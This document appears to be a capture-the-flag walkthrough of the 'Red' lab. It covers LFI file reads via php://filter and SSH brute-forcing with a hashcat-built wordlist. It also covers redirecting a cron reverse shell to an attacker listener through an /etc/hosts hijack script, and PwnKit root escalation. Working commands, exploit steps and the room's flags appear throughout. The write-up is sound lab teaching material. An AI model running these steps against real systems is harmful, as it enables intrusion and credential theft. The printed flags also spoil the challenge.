Red
A classic battle for the ages.
Scanning
Scan the target:
nmap -sS -sV -sC -T4 10.10.196.223
There are two open ports, ssh and http.
HTTP
Check the webpage and you will see a parameter, ?page=home.html.
That looks like a Local File Inclusion (LFI) vulnerability.
So I tried some payloads like ?page=../../../etc/passwd and ?page=....//....//....//etc/passwd, but they do not work: the plain traversal sequences are evidently being filtered.
After some research I found "Exploiting Local File Inclusion (LFI) Using PHP Wrapper". The php://filter wrapper with only a resource= part returns the file unchanged, and because the path is consumed by the stream wrapper rather than used directly, the traversal filter no longer gets in the way:
?page=php://filter/resource=/etc/passwd
(If you need to read PHP source instead of a text file, add convert.base64-encode/ before resource=, otherwise the included PHP is executed rather than shown.)
We see two users on the machine, called red and blue.
Enumeration
I will use LFI Hunter to enumerate some interesting files through the same wrapper:
git clone https://github.com/hadrian3689/lfi_hunter
cd lfi_hunter
python3 lfi_hunter.py -u 'http://10.10.196.223/index.php?page=' -l 'php://filter/resource=' -w unix.txt
It reveals a lot of information, but the interesting part is in blue's bash history:
blue built a password list from a .reminder file by running hashcat with the best64 rule set.
?page=php://filter/resource=/home/blue/.reminder
The .reminder file holds a single word, so recreate the password list with the same command:
echo 'sup3r_p@s$w0rd!' > pass.txt
hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
Exploitation
So, let's brute-force blue's SSH password with hydra using that list:
hydra -l blue -P passlist.txt ssh://10.10.196.223
Then ssh in as blue with the password hydra found:
ssh blue@10.10.196.223
password: sup3r_p@s$w0rd!23
| Flag | flag1 |
|---|---|
| Answer | THM{Is_thAt_all_y0u_can_d0_blU3} |
After logging in I get a message from red, get kicked off the machine, and blue's password is changed.
Try again:
hydra -l blue -P passlist.txt ssh://10.10.196.223
# then ssh in again with the new password
ssh blue@10.10.196.223
There is a cron job writing those annoying messages; you can check it with pspy or just the simple way:
ps aux
We see a reverse shell command that connects to redrules.thm on port 9001 and runs every minute.
I decided to check the hosts file to see what this domain is:
cat /etc/hosts
It turns out we have write permission on it, so point redrules.thm at our own machine and start a listener on 9001 before the next run of the cron job:
echo '10.18.37.45 redrules.thm' >> /etc/hosts
nc -vlnp 9001
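A blind append, as above, is fine when the name is not yet in the file. If redrules.thm already has an entry, the earlier line may still be tried before ours and the cron job's shell would keep going to the original host. The script below, added for this writeup (not code from the room), removes any existing mapping for the name before adding ours, and only rewrites the file after checking it is actually writable. The sample hosts content and the addresses in it are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Point a hostname at our listener by rewriting /etc/hosts.

Added example for this writeup, not code from the room. Strips existing
mappings for the name instead of blindly appending.
"""
import os
import sys

HOSTS = "/etc/hosts"


def pin_hostname(hosts_text: str, name: str, ip: str) -> str:
    """Return hosts-file content in which `name` maps only to `ip`.

    Any line listing `name` has that alias removed (the whole line is
    dropped if no other names remain on it); comments and unrelated lines
    are left untouched; a fresh `ip name` line is appended at the end.
    """
    out = []
    for line in hosts_text.splitlines():
        body, hash_, comment = line.partition("#")
        fields = body.split()
        if len(fields) >= 2 and name in fields[1:]:
            keep = [fields[0]] + [f for f in fields[1:] if f != name]
            if len(keep) >= 2:  # other names still use this address
                out.append(" ".join(keep) + ((" #" + comment) if hash_ else ""))
            continue            # only `name` was on this line: drop it
        out.append(line)
    out.append(f"{ip} {name}")
    return "\n".join(out) + "\n"


def hijack(name: str, ip: str, path: str = HOSTS) -> bool:
    """Rewrite `path` in place if this user can write it; True on success."""
    if not os.access(path, os.W_OK):
        print(f"{path} is not writable by this user", file=sys.stderr)
        return False
    with open(path) as fh:
        text = fh.read()
    with open(path, "w") as fh:
        fh.write(pin_hostname(text, name, ip))
    return True


if __name__ == "__main__":
    # usage: python3 hosts_hijack.py redrules.thm 10.18.37.45
    # then run `nc -vlnp 9001` and wait for the next cron minute.
    target_name, my_ip = sys.argv[1], sys.argv[2]
    sys.exit(0 if hijack(target_name, my_ip) else 1)
```

Before running it on the box, cat /etc/hosts afterwards and confirm exactly one line names redrules.thm; the cron job fires once a minute, so the listener must already be up when it does.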
| Flag | flag2 |
|---|---|
| Answer | THM{Y0u_won't_mak3_IT_furTH3r_th@n_th1S} |
Privilege Escalation
So we got the shell; upgrade it to a proper TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
Find SUID binaries:
find / -perm -u=s -type f 2>/dev/null
Among them is pkexec, which after some research turns out to be vulnerable to CVE-2021-4034 (PwnKit).
However, gcc and make are not installed on the target, so the usual C exploit cannot be built there.
So find an exploit written in Python instead:
git clone https://github.com/joeammond/CVE-2021-4034
cp CVE-2021-4034/CVE-2021-4034.py pwnkit.py
vi pwnkit.py
Edit the location of pkexec in the script to match the target (check it with which pkexec), then run it:
python3 pwnkit.py
That gives a root shell and our final flag:
| Flag | flag3 |
|---|---|
| Answer | THM{Go0d_Gam3_Blu3_GG} |